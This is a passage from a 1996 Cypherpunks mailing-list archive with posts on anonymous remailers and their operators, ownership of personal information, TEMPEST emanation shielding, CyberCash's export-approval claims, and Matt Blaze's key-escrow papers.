> investigated by some official authority because your remailer was using
> them as a front without their express knowledge and permission.

No, they dont. And yes, it probably is bad netiquette. Unfortunately, the
idea of your friendly neighborhood remailer is dying very quickly. Using
other remailers as out-points is fine in so far as it goes, but someone
eventually must eventually send mail to someone who isnt a remailer.

If we define a remailer as a site that strips identifying headers from
mail and passes it to its destination, then these sites are in fact
remailers. They simply dont advertise themselves as such.

Why is it that hundreds of government and university machines can operate
what amount to anonymous remailers, and no one pays any attention, and yet
cypherpunks are threatened with jail time for what is essentially the same
thing? 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 28 May 1996 14:14:25 +0800
To: Subir Grewal <grewals@acf2.nyu.edu>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <9605280210.AA20962@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 27 May 96 at 21:46, Subir Grewal wrote:

> > Oh, you mean, "for them, anybody who pass a judgment of his own
> > that :contradict them should be killed"  I see...

> Glad you noticed that.  Now tell me how AP for any other cause is
> different?

It has similarities.  But AP will not be the enforcer of *one* 
opinion.  And, according to Jim Bell, people will realize that the 
best way to behave is to adopt a low profile.

Again, this is where I do not agree with JB, although I cannot say I 
disagree.  I simply do not know.

Maybe, since the basis for sustenance of human life is production, 
and since the majority has to be producers, the majority will endorse 
more libertarians ideas.

But again, maybe Joe Average was so convinced that "the rich" owe him
a free lunch that AP will lead to complete destruction of the system.

I personnally tend to believe that Joe Average still has some common 
sense and integrity.

JFA
PLEASE NOTE: THIS POST DOES NOT MEAN THAT I ENDORSE MR. BELL'S
SYSTEM.  MY RATIONNAL CONCLUSIONS ABOUT IT'S INTERNAL MECHANICS
AND IT'S INTRINSIC LOGICS DOES NOT MEAN THAT I LIKE NOR ENDORSE
THE SYSTEM. I SIMPLY CONCLUDED THAT IT IS IMPOSSIBLE TO PREVENT
THE SYSTEM FROM BEING IMPLEMENTED.  IMO, IT IS UNAVOIDABLE.

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 28 May 1996 16:50:54 +0800
To: "E. ALLEN SMITH" <markm@voicenet.com
Subject: Re: Mixmaster version usable with POP?
Message-ID: <199605280529.WAA04756@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:44 AM 5/27/96 EDT, E. ALLEN SMITH wrote:
>From:	IN%"markm@voicenet.com"  "Mark M." 26-MAY-1996 18:46:13.23
>
>>On Linux this works:
>>popclient -3 -c POPHOSTNAME | formail -s mixmaster -R >> $MAIL
>
>>It will work on any system that has formail and popclient on it.
>
>	Is this only for getting mail, or also for sending it? Sorry, I'm
>not very familiar with UNIX, especially the pipe commands.

A pipe takes the standard output of the program on the left-hand side
and feeds it to the standard input of the program on the right.
On Real Operating Systems, like Unix, both programs are running at once,
so the pipe doesn't need to buffer very much information; MS-DOS fakes
it out by running the first command while dumping its output in a temp file,
then running the second command with its input from the temp file.

A program named "popclient" is almost certainly designed for fetching
mail from a Post Office Protocol server, which keeps a mailbox for you.
I'm don't know what "formail" does, but it's presumably going to crunch
your newly fetched mail through mixmaster to send it out.  (A not unreasonable
guess for what it does is to take a bunch of mail from standard input
(e.g. the output of popclient) and crunch each mail message according to
the options on the command line, for instance filing it, prettyprinting it,
or whatever.)


So this is a remailer.  To just send mail, you'd use mixmaster.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 28 May 1996 19:05:33 +0800
To: cypherpunks@toad.com
Subject: Re: Philosophy of information ownership [ Re: Children's Privacy Act ]
Message-ID: <2.2.32.19960528055505.006ae230@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:24 AM 5/27/96 -0500, Mike McNally wrote:

>What if I just *see* your couch, and then back in my garage I use my
>couch replicator to make a couch just like yours, complete with fuzzballs
>and loose change between the cushions?  Now I have your couch, in a sense.
>Are you still upset?

Watch and act. This doesn't bother me.

What specifically bothers me is the reselling of information that I chose to
reveal for a specific transaction, most especially when I did so with an
assumption of privacy. I'm happy to provide businesses with the info they
need to see that I'm not going to stiff them on a sale. I am _very_ unhappy
that some of them then turn around and sell that info to others, and doubly
so when what gets passed on is wrong.

>When I walked off with your blood chemistry data, did you lose the use
>of it for your future purposes?

What I've lost here is privacy, something which does have monetary value to me.

[example of info gleanable by my reading/posting to Cypherpunks and other
sources out there for the world to see]
>What do you propose as to the obligations I should have to you as regards
>the disposition of this information?  For example, what if I receive a 

Things like that don't bother me, either. If I really didn't want to be
associated with Cypherpunks that way, I could do things to protect my identity.

On the other hand, say I sign up for a mailing list that charges a
subscription fee, like Extropians. I would feel no ground for complaint if
someone markets a list of Extropian subscribers - but I'd feel much ground
for complaint if I learned the list owner were selling credit histories
gathered during the subscription process. (Unless, of course, I assent to a
clause to the effect that the list owner can do anything he wants with my
credit info, as opposed to the specific purpose of getting payment for the
list.)

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 28 May 1996 19:12:19 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Remailers & liability
Message-ID: <2.2.16.19960528062833.26bfd90e@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:06 PM 5/27/96 EDT, E. Allen Smith wrote:

>	Why, precisely, do you think that remailers don't do much good where
>the operator isn't root? The possibility of the sysop looking at the mail &
>getting the private key, the increased susceptibility to cracking of
>non-root accounts, possible sysop non-cooperation in an honest manner (as
>opposed to the first one), or what?

I think it's more difficult to covertly monitor communications through a
remailer if the remailer operator isn't root; this is also the case if the
primary MX record doesn't point directly to a machine under the operator's
control. I think it'd be possible for a hostile party to monitor/intercept
communications through any remailer; but it's more likely to cause an
unexplained disruption or outage where the hostile party has less access to
the target machine/network, and the operator (who we assume is trusted) has
more access.

I also think that where root is not the remailer operator, root is a lot
less likely to say "fuck off you evil TLA I won't help you monitor remailer
traffic." My hunch is that many/most remailer operators would shut down a
remailer instead of letting a TLA monitor traffic, and/or would refuse to
take clear steps to publically reestablish the integrity of a remailer if
its confidentiality was in question. My hunch is that many/most
"professional" sysadmins would let a TLA monitor traffic if a user was
running a remailer, and wouldn't do anything to let either the user/operator
or the clients of the remailer know anything was amiss. Look at the way that
the WELL and Netcom and AOL (I'm probably missing some examples here) have
been willing to let amateur and professional spooks & cops wander around
their systems reading mail and looking in home directories while chasing
"bad guys". How many ISP's are going to say "come back with a warrant" if
cops show up with badges & guns, saying "User X is running a remailer which
sends kiddie porn/drug sales transaction info/whatever"? I bet very, very
few. (And no, the ECPA won't be much help, see _Steve Jackson Games_ re
"what does intercept mean?")

Obviously I'm talking about "more" and "fewer" and hunches, not a
mathematical proof. This is really just another web-of-trust; I may trust X
to run a remailer (and not log traffic or disclose it to outsiders), but I
probably don't trust X to pick a service provider who will not be
susceptible to "the Briefing" and who won't hire anyone as a sysadmin who
isn't bribable or coercible. 

My intention is not to slam remailer operators who aren't root, just to
point out that the level of protection we should expect from those remailers
is relatively small. Ditto for remailers operated by unknown nyms who don't
have well-known people willing to vouch for their integrity. Truly, no
offense is intended. If I have some idea who the remailer operator is, and
they are root, I feel like I learn something if the operator says "My system
doesn't log traffic." If the operator isn't in a position to know (because
they're not root) or if I don't have a reason to trust them, I assume the
remailer is logging traffic. And a remailer that logs traffic may be more
dangerous than no remailer at all, because the amount of security provided
is illusory. 

--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peng-chiew low <pclow@pc.jaring.my>
Date: Tue, 28 May 1996 03:25:43 +0800
To: dcsb@ai.mit.edu
Subject: Re: CyberCash just did it!
In-Reply-To: <31A8F226.33C@netconx.de>
Message-ID: <31A9E1AA.53B0@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Markus Guehrs wrote:
> Is anybody aware of the fact that CyberCashs credit card payment system
> (http://www.cybercash.com) is an almost 1:1 SET implementation. Since
> this system is now working and SET is still a draft I assume the SET
> authors got/took/copied many ideas from CyberCashs genius software
> system.

Out of curiousity I visited their site and I read the part of the security
section which I've pasted below. Is it true? After all that I've read about
the export issue and here Cybercash tells me they have got permission to
export strong crypto? Please note that I am not someone who is familiar with
the strength of crypto algo and any response to this post would be most helpful
to a newbie in this business. Thanks.

Quote from Cybercash's web page : 

http://www.cybercash.com/cybercash/wp/bankwp.html#security

 " CyberCash transactions are protected by a powerful and sophisticated
   system of encryption, combining DES private-key and RSA public-key 
   encryption technologies. In fact, CyberCash's 768-bit RSA key encryption
   capability is unique in that it is the most powerful encryption technology
   currently licensed by the United States government for export. CyberCash 
   also has been approved by the government for 1024-bit RSA key encryption,
   and will be providing that technology by the end of 1996. "




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 28 May 1996 18:45:19 +0800
To: cypherpunks@toad.com
Subject: Re: Philosophy of information ownership
Message-ID: <adcff579000210040142@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:55 AM 5/28/96, Bruce Baugh wrote:

>What specifically bothers me is the reselling of information that I chose to
>reveal for a specific transaction, most especially when I did so with an
>assumption of privacy. I'm happy to provide businesses with the info they
>need to see that I'm not going to stiff them on a sale. I am _very_ unhappy
>that some of them then turn around and sell that info to others, and doubly
>so when what gets passed on is wrong.

Contracts are the key. If Alice contractually agreed to hold data
confidential, then didn't, Bob would have a case for suing. If Bob revealed
information without a contract, Alice can do with it as she pleases.

And in most of the cases I was talking about a few days ago (I was gone for
the weekend and could not participate in this debate until now), Alice is
using various records or observations that are free for anyone to remember,
save, use, etc. Alice compiles a dossier on Bob based on press items,
public court records, bankruptcy filings, divorce decrees, and all the
various things that are available to anyone who is "observant."

(The government has attempted to interfere with this record-keeping and
-reporting, such as with the "Fair Credit Reporting Act," which makes the
"remembering" of bankruptcies, defaults, and other such indiscretions a
crime if the records are greater than 7 years, or somesuch. My point is
that such laws are not only unconstitutional, even under the "regulate
commerce" clause, but are laws which ultimately invite the government to
inspect the files and records of someone...so much for "secure in one's
papers.")

Face it, if one makes public utterances, or utterances on lists like this,
or one files for bankruptcy protection, or any number of such things, then
others can and will "remember" these things. How they use these
remembrances or who they pass them on to, or sell them to, has *never* been
something that the U.S. government has been empowered to control or
regulate. Until recently, of course. All to the worse.


>>When I walked off with your blood chemistry data, did you lose the use
>>of it for your future purposes?
>
>What I've lost here is privacy, something which does have monetary value to me.

As others have noted, the proper solution is to make contractual
arrangements with those doing blood analyses, or handling the data. It
works for financial data, more or less, and so on. There is no
justification (and many reasons against such a thing) for invoking some
nebulous "right to personal information."

>[example of info gleanable by my reading/posting to Cypherpunks and other
>sources out there for the world to see]
>>What do you propose as to the obligations I should have to you as regards
>>the disposition of this information?  For example, what if I receive a
>
>Things like that don't bother me, either. If I really didn't want to be
>associated with Cypherpunks that way, I could do things to protect my identity.

Fine, you draw the line at "Cypherpunks information can be revealed, but
you'd better not reveal XYZ." Others would use your same logic to argue
that even the "who cypherpunks" command information is "private" and not to
be compiled into a dossier or revealed or, God forbid, sold.

Again, what are the contractual relationships?

>On the other hand, say I sign up for a mailing list that charges a
>subscription fee, like Extropians. I would feel no ground for complaint if
>someone markets a list of Extropian subscribers - but I'd feel much ground
>for complaint if I learned the list owner were selling credit histories
>gathered during the subscription process. (Unless, of course, I assent to a
>clause to the effect that the list owner can do anything he wants with my
>credit info, as opposed to the specific purpose of getting payment for the
>list.)

Here you seem to be referring to contracts. A good start.

And much better than mere appeals to intuition about what ought to be
private and what ought to be public.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 28 May 1996 19:33:06 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Remailers - What exists?
Message-ID: <199605280739.AAA07812@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 5/24/96 -0400, Black Unicorn <unicorn@schloss.li> wrote:
>Question:
>Which remailers can be run without root?
>Which remailers can be run best on the most systems?
>Which remailers are easiest to set up?

Basic remailers can run fine as a mail user on any Unix system
that supports executing user-specified programs on incoming mail.
Almost any modern Unix system will do this, either through sendmail
.forward files or some similar (dangerous :-) mechanism.
Even on systems that don't do it automagically, you can
batch the mail through a remailer command either by hand or
using a cron script if your system lets you.
It helps a lot to have an account that isn't your main email
account, because it's going to get lots of junk in it
that you want to discard most of, so you'd be better
off without your real mail going there, unless you're
a procmail wizard.

Mixmaster-style remailers are more secure than vanilla ones,
but of course you need to use the Mixmaster client software
to use them, which could be a problem if you're a DOS or Mac user.

Being root gets you a couple of things:
- ability to set up multiple names to receive mail on,
  which you need to run a user-friendly 2-way remailer, like
  anon.penet.fi or alpha.c2.org.  Some sendmail flavors
  have extensions on user names ( myname+whatever@machine.edu )
  which would let you do the same thing as a regular user,
  but it doesn't seem to be a widespread feature.
- ability to mess with the sendmail logs
- ability to tell the backup software not to back up your
  spool directory (which would be Really Bad, especially
  if your computer provider keeps backups forever.)
  The alternative is to put it under /tmp somewhere,
  and just make sure it recovers if too much stuff gets 
  deleted by regular daemons.
- Extra Slack for mail-to-news gateways.  You can often
  do them without being root, but not everywhere,
  and it's harder to fake From: addresses if you're not root.

Of course, you can always run Linux at home - there are
even new versions for Mac coming out.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 28 May 1996 19:35:54 +0800
To: SpyKing <spyking@mne.net>
Subject: Re: Tempest Info
Message-ID: <199605280739.AAA07817@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


There was some interesting stuff on the web page about
experience TEMPEST-surfing CRTs, and Sarah Ellerman's article
is better than some of its sources, but there's still bogosity around.

>It's so secret that the Feds refuse to even release its real name. 
>Privacy advocates have filled the void by nicknaming this
>technology "TEMPEST," which stands for "Transient Electromagnetic Pulse
>Emanation Surveillance Technology." 

Nope.  TEMPEST _is_ its real name.  It's not an acronym, and the stuff
doesn't even deal with Transient ElectroMagnetic Pulses; that's somebody's
attempt to take a non-acronym and find plausible buzzwords to fill it.

>What it does is allow a simple scanning device to read the output from 
>your monitor from up to one kilometer away.

It's not just about monitors; they're just easy targets because they're
usually electrically noisy, and the stuff they broadcast is in an easily
usable form (if you've got a monitor around that can handle the output
frequencies required, which is to say it costs at least as much
as the monitor you're bugging :-).  One reason they're noisy is the
basic technology they use; another is that they're hard to stick in 
metal boxes because you'd like to be able to see the screen.
In the days before FCC Class A and Class B certification became
near-mandatory, there were a _lot_ of noisy devices out there;
one early dot-matrix electronic typewriter could be read a couple
of miles away.  On the other hand, random signals from your CPU's crunching
are not only harder to detect among all the other electronic noise,
it's hard to translate them into anything human-readable.

>We headed east toward the New York Post newspaper offices and read the
>latest news off their monitors (which was printed the next day). We headed
>north toward City Hall and NYPD Police Headquarters. Guess what? They're not
>Tempest-certified either...Neither is the United Nations, any of the midtown

About 8-10 years ago, TEMPEST-certified computers typically cost about
$5000 more than equivalent regular computers, as well as being 6-12 months
behind the commercial products they were based on.  A big reason for
this is that certification is an expensive technical and paperwork process,
and most products aren't going to sell enough units to spread the cost around.
Sure, some of it's due to shielded cables, grounded metal boxes, and
paying careful attention to board design.

As one of the posters pointed out, you can cut down your exposure a lot
by using an LCD display instead of a CRT, and sticking to FCC Class B equipment,
which is a tighter standard than Class A.

One of the articles also described making a shielded room using some of 
the non-woven carbon-fiber fabric shielding, and said it didn't stop everything.
Shielding is a tricky business - modern computers have a lot of harmonic energy
in the 100 MHz - 10 GHz ranges, especially now that clock speeds are
in the 100 MHz range instead of the 8 MHz range that was common when I started,
so the wavelengths get very short and stuff leaks out easily around joints
unless you're very careful about both the technology and the installation;
you've _got_ to test a room for tightness and hunt down all the leaks
before you can trust it.  Also, of course, your electrical power system
needs to be shielded and filtered, so only 60Hz gets through,
unless you plan to stick to laptops and bring in spare battery packs.


#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 28 May 1996 19:27:29 +0800
To: cypherpunks@toad.com
Subject: Re: Philosophy of information ow
Message-ID: <adcffa6e010210042b50@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:46 PM 5/27/96, Chris Adams wrote:
>On 27 May 1996 11:25:28 pdt, m5@vail.tivoli.com wrote:
>
>>What if I just *see* your couch, and then back in my garage I use my
>>couch replicator to make a couch just like yours, complete with fuzzballs
>>and loose change between the cushions?  Now I have your couch, in a sense.
>>Are you still upset?
>>
>>When I walked off with your blood chemistry data, did you lose the use
>>of it for your future purposes?
>
>I believe that you are free to keep information, use it, etc. but
>you MUST get permission before selling it.


This opinion summarizes what's wrong with the world today.

Facts are facts. Statements about reality. If I happen across a piece of
information, such as "Chris Adams is subscribed to the Cypherpunks list," I
need not get permission from Chris Adams to sell this fact to another.
(Unless of course I have a contractual relationship with Chris involving
this in some way.)

Not even in these Beknighted States, unless the laws have recently gotten
much worse that they were a short while ago.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Tue, 28 May 1996 11:50:12 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Edited Edupage, 26 May 1996
In-Reply-To: <01I57IV7LQ068Y503M@mbcl.rutgers.edu>
Message-ID: <Pine.3.89.9605280044.A11498-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 27 May 1996, E. ALLEN SMITH wrote:

> 	I would guess that these phones would still not be crypto-capable, but
> I'm not quite sure what they have in mind to use Java in them for.

	Porting PGPhone to JAVA, perhaps?

        xan

        jonathon
        grafolog@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 28 May 1996 12:39:15 +0800
To: cypherpunks@toad.com
Subject: MIN_ers
Message-ID: <199605280112.BAA26773@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   New Sci 25 May 1996: 
 
   "Panning for data gold." 
 
      Nowadays nearly every organization from supermarkets to 
      the police can boast a vast mine of electronic data. 
      Separating the gold from the dross is the real 
      challenge. A growing band of computer scientists say 
      they can dig out nuggets of 24-carat knowledge from huge 
      mountains of database dross. They call themselves "data 
      miners", and they are wielding some pretty impressive 
      tools -- information theory, laws of probability,  
      neural networks, tree induction, genetic algoritms,  
      disjunctive normal form logic. 
       
      But the impact of their efforts is anything but esoteric. 
      By identifying potential new customers -- or ways of 
      hanging on to existing ones -- this information is worth 
      millions in extra revenue. And this is just the start, 
      according to Usama Fayyad of Microsoft Research and 
      co-editor of a new book on data mining. 
 
   MIN_ers 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 28 May 1996 12:36:39 +0800
To: cypherpunks@toad.com
Subject: SEM_tex
Message-ID: <199605280113.BAA26887@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   New Sci 25 May 1996: 
 
   "Forensic lab awash with Semtex." 
 
      Just 5 nanograms of RDX -- one of the ingredients in 
      Semtex -- is enough to link a suspected terrorist to a 
      bombing. Yet the DERA forensic laboratory that carries 
      out tests in many high-profile terrorist cases 
      frequently finds more than this on its floor. "It's 
      horrifying," says an independent forensic scientist  
      who specialises in explosives cases. "They seem to  
      have been getting contamination all the time." 
 
      In contrast, forensic experts frequently say that the 
      Forensic Science Agency in Northern Ireland has the most 
      thorough precautions against contamination. The agency 
      moved to a new laboratory in 1992 after the IRA blew up 
      its old one. 
 
   SEM_tex 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Tue, 28 May 1996 11:10:17 +0800
To: cypherpunks@toad.com
Subject: noneAttn Sameer:  Are alias@alpha.c2.org and/or remail@c2.org down?
Message-ID: <199605272325.BAA23173@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


My 'nym which has worked just fine has suddenly stopped working this
weekend.  My reply block has not changed, and the only remailer in
it is remail@c2.org.

I have the reply block set up to send the encrypted reply to
remail@c2.org where Newsgroups:  and Subject:  headers are pasted on
with the "##" operator.  The message is then sent on to the replay
mail2news gateway for posting to alt.anonymous.messages.

What's happened?  Anyone know?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 28 May 1996 21:00:49 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <add00ed304021004f629@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:52 PM 5/26/96, Paul J. Bell wrote:
>a good idea.  what we really need to do is to obtain, by whatever means
>seems available, a copy of "the briefing", and to publish it,
>on the web/net, with detail anotations of each point. having
>their story in public view would certainly take away a lot of it's power.
>also, on the off chance that there were any errors in their version of
>the facts, it could make for an interesting q&a session when the next
>receiptent didn't buy the pitch.
>
>        -paul
>ps.. no, i don't know, right off-hand, how to obtain such a copy,
>but if the employee manual that was making the rounds a few years was
>what it porported to be, well, there's hope for this document to
>see the light of day. (-:

I doubt this. The "NSA Employee's Manual" which was published (first by
2600 or Phrack, then on the Net by Grady Ward) was of course just the
typical stuff handed out to the 25,000 or so employees of the NSA...any of
them could have passed the stuff on to 2600 or Phrack. Nothing very
sensitive for such a large "corporation."

"The Briefing" is an altogether different thing. A private briefing, with
photos, maybe audio and video clips, and definitely "personal." Classified
information, intelligence sources revealed or hinted at, etc. It is almost
certainly not some kind of printed document. And certainly not sent out to
lots of people.

In any case, I don't think this is something one really "refutes." Because
the events are likely real events, and are thus irrefutable. (As to
catching the NSA in outright lies, I doubt this. Enough real stuff that
they wouldn't have to invent history. In my opinion, of course.)

What can be refuted are the possible claims that particular events imply
that civil liberties need to be restricted, or that crypto needs to be
controlled. That is, the philosophical points.

And for this we already have anticipated most of the likely scenarios, aka
the Four Horsemen.

Sure, I'd like to hear what is being whispered to the burrowcrats to scare
them so much....but "obtain, by whatever means seems available" is
something I'll leave for you black bag operatives to take care of. Good
luck!

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 28 May 1996 18:39:46 +0800
To: cypherpunks@toad.com
Subject: Re: net-based key archival
In-Reply-To: <9605280603.AA24810@anon.penet.fi>
Message-ID: <199605280732.DAA04752@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



an116512@anon.penet.fi writes:
> I just brought these files down + a few others in the same directory that
> he didnt tell us about (you can see them with netscape by leaving off the
> last part. Check out MKCS.PS and others. They take a while to see because
> you need a postscript viewer but if you can read them they are
> enlightening abot this guys character. It looks like AT&T is in the
> key escrow biz, folks!!! Maybe someone should scan them in and post
> them to the list, so we know what the enemy is doing.
> 
> The MKCS.PS file is about how to make a code for other people to use so
> that you can break. And then they say dont worry the government would never
> do this!!! Riiiiggggght.

God, your are an imbecile. You couldn't even be bothered to read the
document you are yelling about, could you.

The MKCS abstract explains the result that Blaze et al arrived at
which shows that generalized systems with back doors in them are
roughly equivalent to public key systems -- that is, any generalized
Master Key Cryptosystem can be used as a public key system. Thus,
although it is possible that there are faster techniques available, it
would appear that to to design a cipher with a back door, we would
have to use techniques that are currently thought to be slow. A lot of
the point was that ciphers like DES are unlikely to have "master key"
style back doors. This result is about the opposite of what you
trumpet.

They come up with some other interesting results about master keyed
systems. None of them are "AT&T is in the key escrow biz" revelations.

Might I suggest that in the future you have someone jackhammer your
head out of the concrete block it is encased in before you make
pronouncements?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 28 May 1996 22:56:42 +0800
To: David Vincenzetti <vince@cryptonet.it>
Subject: Re: holographic remailing & the scientologists (fwd)
In-Reply-To: <199605280855.KAA23960@relay.cryptonet.it>
Message-ID: <Pine.SUN.3.93.960528033123.17016A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 May 1996, David Vincenzetti wrote:

> A number of secret-sharing/splitting programs for Unix are available
> at idea.sec.dsi.unimi.it/pub/crypt/code, ftp.dsi.unimi.it's new location
> 
> For instance, check idea.sec.dsi.unimi.it/pub/crypt/code/secshar.tar.gz

Disperse/Collect is a information dispersal program rather than a secret
sharing program.  They are similiar have different purposes.  Here we
want to improve accessibility and reliability without regard to secrecy.
That is, for information dispersal we don't care if information about the
original file is leaked with with each share, whereas secret sharing has
to guarantee that an attacker can find out nothing about the original
secret unless he has at least k shares.

That aside, Disperse/Collect might be better suited for what Vladimir had
in mind because it was explicitly designed for broadcasting files through
Usenet.  The secret sharing programs you mention would not work well
because each share would be as big as the original secret.  (There are
secret sharing schemes with short shares, but I don't think any of those
programs implement the more efficient schemes.)

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 28 May 1996 22:55:53 +0800
To: cypherpunks@toad.com
Subject: World Economic Forum (fwd)
Message-ID: <199605281057.DAA04719@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Horsemen continue to ride.

---------- Forwarded message ----------

Last night, C-SPAN carried a public session from the WEF meeting held last 
February in Davos, Switzerland.  It looked like a chorus of kinder 
gentler totalitarians, fascists, and Big Brothers.  Louis Freeh, speaking 
in bureaucratese, said it was time to create an international police 
force, stamp out uncrackable encryption, and enlist business as allies in 
implementing the total surveillance state.  Elie Wiesel, guru of Humanism 
from Boston U., was more direct and explicitly called for an 
international police force to protect us from nuclear terrorists and 
other bogeymen.

One bright note:  Freeh said a recent poll of interest to his bureau 
discovered that 10% of Americans believe the U.S. government was 
complicit in the Oklahoma City bombing.  Maybe there is hope after all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Tue, 28 May 1996 17:36:21 +0800
To: cypherpunks@toad.com
Subject: Re: net-based key archival
Message-ID: <9605280603.AA24810@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


In .cypherpunks, Matt Blaze <mab@research.att.com> writes:
>I've put a revised version of my "Key Escrow without Escrow Agents"
>abstract in my ftp directory, in PostScript and Latex formats.
>	ftp://research.att.com/dist/mab/netescrow.ps
>	ftp://research.att.com/dist/mab/netescrow.tex

I just brought these files down + a few others in the same directory that
he didnt tell us about (you can see them with netscape by leaving off the
last part. Check out MKCS.PS and others. They take a while to see because
you need a postscript viewer but if you can read them they are
enlightening abot this guys character. It looks like AT&T is in the
key escrow biz, folks!!! Maybe someone should scan them in and post
them to the list, so we know what the enemy is doing.

The MKCS.PS file is about how to make a code for other people to use so
that you can break. And then they say dont worry the government would never
do this!!! Riiiiggggght.

PS I hope this message goes through, my posting software on connectnet doesn't
work so I'm using penet.
   ++arlo
:
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
